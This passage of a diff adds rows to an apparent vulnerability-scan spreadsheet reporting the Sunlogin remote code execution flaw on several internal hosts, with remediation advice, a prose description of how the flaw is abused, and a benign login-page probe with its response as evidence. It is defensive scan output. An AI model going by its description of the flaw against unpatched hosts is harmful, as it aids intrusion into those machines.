&gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X11" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y11" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="12">
+      <c r="A12" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B12" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C12" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D12" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E12" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F12" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G12" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H12" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I12" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J12" t="inlineStr"/>
+      <c r="K12" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L12" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:25</t>
+        </is>
+      </c>
+      <c r="M12" t="inlineStr">
+        <is>
+          <t>192.168.50.76</t>
+        </is>
+      </c>
+      <c r="N12" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O12" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P12" t="inlineStr"/>
+      <c r="Q12" t="inlineStr"/>
+      <c r="R12" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S12" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T12" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U12" t="inlineStr"/>
+      <c r="V12" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W12" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X12" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y12" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="13">
+      <c r="A13" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B13" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C13" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D13" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E13" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F13" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G13" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H13" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I13" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J13" t="inlineStr"/>
+      <c r="K13" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L13" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M13" t="inlineStr">
+        <is>
+          <t>192.168.54.100</t>
+        </is>
+      </c>
+      <c r="N13" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O13" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P13" t="inlineStr"/>
+      <c r="Q13" t="inlineStr"/>
+      <c r="R13" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S13" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T13" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U13" t="inlineStr"/>
+      <c r="V13" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W13" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X13" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y13" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="14">
+      <c r="A14" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B14" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C14" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D14" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E14" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F14" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G14" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H14" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I14" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J14" t="inlineStr"/>
+      <c r="K14" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:33</t>
+        </is>
+      </c>
+      <c r="L14" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:33</t>
+        </is>
+      </c>
+      <c r="M14" t="inlineStr">
+        <is>
+          <t>192.168.50.143</t>
+        </is>
+      </c>
+      <c r="N14" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O14" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P14" t="inlineStr"/>
+      <c r="Q14" t="inlineStr"/>
+      <c r="R14" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S14" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T14" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U14" t="inlineStr"/>
+      <c r="V14" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W14" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X14" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y14" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="15">
+      <c r="A15" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B15" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C15" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D15" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E15" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F15" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G15" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H15" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I15" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J15" t="inlineStr"/>
+      <c r="K15" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:25</t>
+        </is>
+      </c>
+      <c r="L15" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M15" t="inlineStr">
+        <is>
+          <t>192.168.50.98</t>
+        </is>
+      </c>
+      <c r="N15" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O15" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P15" t="inlineStr"/>
+      <c r="Q15" t="inlineStr"/>
+      <c r="R15" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S15" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T15" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U15" t="inlineStr"/>
+      <c r="V15" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W15" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X15" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y15" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="16">
+      <c r="A16" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B16" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C16" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D16" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E16" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F16" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G16" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H16" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I16" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J16" t="inlineStr"/>
+      <c r="K16" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L16" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M16" t="inlineStr">
+        <is>
+          <t>192.168.54.174</t>
+        </is>
+      </c>
+      <c r="N16" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O16" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P16" t="inlineStr">
+        <is>
+          <t>test1111</t>
+        </is>
+      </c>
+      <c r="Q16" t="inlineStr"/>
+      <c r="R16" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S16" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T16" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U16" t="inlineStr"/>
+      <c r="V16" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W16" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
